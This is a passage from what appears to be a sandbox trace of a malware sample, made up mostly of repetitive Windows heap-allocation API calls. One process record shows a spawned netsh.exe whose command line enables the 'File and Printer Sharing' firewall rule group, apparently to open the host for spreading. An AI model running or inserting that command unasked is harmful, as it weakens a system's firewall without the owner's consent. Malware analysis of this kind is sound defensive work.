| out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d78 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506da8 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506db8 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506dc8 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506dd8 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506de8 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506df8 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e08 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e18 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e28 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e38 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e48 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e58 | out: hHeap=0x4f0000) returned 1 [0159.053] GetProcessHeap () returned 0x4f0000 [0159.053] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506e68 | out: hHeap=0x4f0000) returned 1 [0159.053] exit (_Code=1) Thread: id = 545 os_tid = 0x113c Thread: id = 738 os_tid = 0x10d8 Thread: id = 741 os_tid = 0xe38 Thread: id = 742 os_tid = 0x1044 Thread: id = 766 os_tid = 0xecc [0136.771] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x54c648 [0136.771] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x51c088 [0136.771] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x54f688 [0136.771] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x54aec0 [0136.771] LocalReAlloc (hMem=0x54f688, uBytes=0x10, uFlags=0x2) returned 0x50bf98 Process: id = "12" image_name = "netsh.exe" filename = "c:\\windows\\syswow64\\netsh.exe" page_root = "0x7956d000" os_pid = "0x524" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"netsh\" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 86 os_tid = 0x5b8 [0081.798] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3dfc84 | out: lpSystemTimeAsFileTime=0x3dfc84*(dwLowDateTime=0xbd6cd10, dwHighDateTime=0x1d6f0d1)) [0081.798] GetCurrentProcessId () returned 0x524 [0081.798] GetCurrentThreadId () returned 0x5b8 [0081.798] GetTickCount () returned 0x114af53 [0081.798] QueryPerformanceCounter (in: lpPerformanceCount=0x3dfc7c | out: lpPerformanceCount=0x3dfc7c*=20089876292) returned 1 [0082.057] GetModuleHandleA (lpModuleName=0x0) returned 0x15f0000 [0082.057] __set_app_type (_Type=0x1) [0082.057] __p__fmode () returned 0x770331f4 [0082.057] __p__commode () returned 0x770331fc [0082.057] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x15f93ef) returned 0x0 [0082.057] __wgetmainargs (in: _Argc=0x1607ef0, _Argv=0x1607ef8, _Env=0x1607ef4, _DoWildCard=0, _StartInfo=0x1607f00 | out: _Argc=0x1607ef0, _Argv=0x1607ef8, _Env=0x1607ef4) returned 0 [0082.058] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0082.058] GetModuleHandleW (lpModuleName=0x0) returned 0x15f0000 [0082.058] _vsnwprintf (in: _Buffer=0x1603ec0, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x3d77f0 | out: _Buffer="netsh>") returned 6 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427058 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427068 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427078 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427088 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427098 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4270a8 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4270b8 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4270c8 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4270d8 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4270e8 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4270f8 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427120 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427130 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427140 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427150 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427160 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427170 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427180 [0082.094] GetProcessHeap () returned 0x410000 [0082.094] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427190 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4271a0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4271b0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4271c0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4271d0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4271e0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4271f0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427200 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427210 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427220 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427230 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427240 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427250 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427260 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427270 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427280 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427290 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4272a0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4272b0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4272c0 [0082.095] GetProcessHeap () returned 0x410000 [0082.095] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4272d0 [0082.095] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4272e0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4272f0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427300 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427310 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427320 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427330 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427340 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427350 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427360 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427370 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427380 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427390 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4273a0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4273b0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4273c0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4273d0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4273e0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4273f0 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427400 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427410 [0082.096] GetProcessHeap () returned 0x410000 [0082.096] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427420 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427430 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427440 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427450 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427460 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427470 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427480 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427490 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4274a0 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4274b0 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4274c0 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4274d0 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4274e0 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4274f0 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427520 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427530 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427540 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427550 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427560 [0082.097] GetProcessHeap () returned 0x410000 [0082.097] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427570 [0082.097] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427580 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427590 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4275a0 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4275b0 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4275c0 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4275d0 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4275e0 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4275f0 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427600 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427610 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427620 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427630 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427640 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427650 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427660 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427670 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427680 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427690 [0082.098] GetProcessHeap () returned 0x410000 [0082.098] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4276a0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4276b0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4276c0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4276d0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4276e0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4276f0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427700 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427710 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427720 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427730 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427740 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427750 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427760 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427770 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427780 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427790 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4277a0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4277b0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4277c0 [0082.099] GetProcessHeap () returned 0x410000 [0082.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4277d0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4277e0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4277f0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427800 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427810 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427820 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427830 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427840 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427850 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427860 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427870 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427880 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427890 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4278a0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4278b0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4278c0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4278d0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4278e0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4278f0 [0082.100] GetProcessHeap () returned 0x410000 [0082.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427920 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427930 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427940 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427950 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427960 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427970 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427980 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427990 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4279a0 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4279b0 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4279c0 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4279d0 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4279e0 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4279f0 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a00 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a10 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a20 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a30 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a40 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a50 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a60 [0082.101] GetProcessHeap () returned 0x410000 [0082.101] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a70 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a80 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427a90 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap 